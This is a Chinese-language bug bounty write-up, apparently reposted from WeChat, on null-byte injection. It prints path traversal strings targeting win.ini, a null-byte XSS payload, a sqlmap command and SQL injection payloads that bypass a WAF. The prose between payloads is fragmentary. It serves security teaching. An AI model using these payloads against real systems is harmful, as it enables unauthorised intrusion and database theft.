大家好,我是 0xold,一名渗透测试员,8 个月前开始了我的漏洞悬赏之旅。今天,我将分享几个我通过 Null 字节注入发现的漏洞,如果没有它们,这些漏洞将无法利用。我将把所有网站称为 company.com,因为我不能披露公司的名称。
什么是 Null 字节字符?
密码重置解析混淆
/test
,并检查了我的电子邮件,得到了以下 URL:路径遍历到 XSS
templatename
。我迅速用 templatename=0xold
的值发出了请求,并检查了服务器的响应。logout.asp
../login.asp
..login.asp
….//login.asp
….//login.asp%00
….login.asp
../../windowswin.ini
....windowswin.ini
templatename
参数不在白名单中就返回 500 状态错误。为了验证我的理论,我决定使用工具 Cewl 来生成一个自定义字典。什么是 Cewl
../
序列?于是我在 templatename
参数中注入了以下值并检查了响应:company.com/0xoldSaysHi/../
company/0xoldSaysHi”>/../
>
字符没有被反映出来,所以我尝试在 >
字符后面注入一个 null 字节字符,看看会发生什么:company/0xoldSaysHi”>%00/../
company/0xoldSaysHi”%00><%00img+src=x+onerror=alert(1337)%00>/../
通过 Null Byte 注入绕过内部 WAF
error_category
参数中输入一个常规的单引号('),网站返回了一个数据库错误,这表明它容易受到 SQL 注入攻击。太好了!我会保存这个请求,然后运行 sqlmap,让它完成所有繁重的工作。r
的文件后,我运行了以下命令:python3 sqlmap.py -r r --batch --dbs --random-agent
UNION+SELECT+1337 -- -
UNION/**/SELECT+1337
test+test+1337 -- -
f’+/**/UNION+%00seLecT+%00TABLE_NAME,TABLE_schema,NULL,NULL,NULL,NULL+FROM+%00INFORMATION_SCHEMA.tables+WHERE+table_schema=’AdminDB’%23
原文始发于微信公众号(白帽子左一):Null 字节在漏洞挖掘中的妙用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论